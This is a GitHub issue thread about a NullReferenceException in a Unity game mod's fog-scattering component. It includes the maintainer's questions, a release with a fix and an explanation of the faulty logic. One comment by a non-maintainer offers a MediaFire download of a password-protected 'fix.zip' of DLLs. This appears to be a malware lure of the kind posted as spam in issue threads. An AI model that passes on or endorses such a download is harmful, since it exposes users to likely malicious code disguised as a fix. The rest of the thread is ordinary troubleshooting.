### ISSUE TITLE
Error in game console

### ISSUE THREAD

**Issue by SGZ-Creations** [CWXDEV/MegaMod#1]
[Exception] : NullReferenceException: Object reference not set to an instance of an object
MBOIT_Scattering.OnRenderImageMBOITMode (UnityEngine.ComputeBuffer scatteringParameters) (at <a5b6eaefee6842aba73e4a77ea14a564>:0)
MBOIT_Scattering.OnPreCull () (at <a5b6eaefee6842aba73e4a77ea14a564>:0)
UnityEngine.DebugLogHandler:LogException(Exception, Object)
Class362:UnityEngine.ILogHandler.LogException(Exception, Object)
UnityEngine.Debug:CallOverridenDebugHandler(Exception, Object)

[Log] : [CWX-MegaMod] ScopeMboit was null? False
[Log] : [CWX-MegaMod] ScopeScattering was null? False
![image](https://github.com/user-attachments/assets/b4ae879e-eff3-4a0a-a55c-ad090c0e5eb3)

**Comment by SagarChandra07** [comment]
maybe this will help
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Pass: changeme
I put the necessary dlls in the archive

**Comment by CWXDEV** [comment]
Heya, can i get some more info?
What scope was you using?
Are you using any other mods that touch scopes/fog?
Does this happen often?

**Comment by CWXDEV** [comment]
Unable to reproduce/need more info and might be outdated for not getting that info for 2 months

**Comment by CWXDEV** [comment]
i have managed to get this to just happen, unsure on the cause right now, reopened issue

**Comment by emilanderss0n** [comment]
I can confirm getting these errors

**Comment by CWXDEV** [comment]
I have released a new version to resolve this.
hopefully its fixed now

**Comment by SGZ-Creations** [comment]
I'll look as i play.

**Comment by CWXDEV** [comment]
aight some people are still getting the error, so i have disabled it completely, it might mean fog is back in the scope depending on the weather in-game

**Comment by CWXDEV** [comment]
i have figured the issue out, however ill leave them disabled, i dont feel like the fog is *so* bad in this version of SPT.
this means we dont have a script running each frame for no reason.
if the weather system changes again ill re-enable it with fixes, closing this for now.
if you are getting NullRefExceptions, make sure you get 1.4.1

**Comment by CWXDEV** [comment]
TLDR for me later down the line if needed, MBOIT_scattering is used on majority of maps (thought it was all maps), Factory for example, the component exists but isnt active, so having FogRemover disabled, inturn enabled MBOIT which is bad logic on my part.
check and take note of starting condition before changing next time
(if you had FogRemover enabled, you actually bypassed this error)
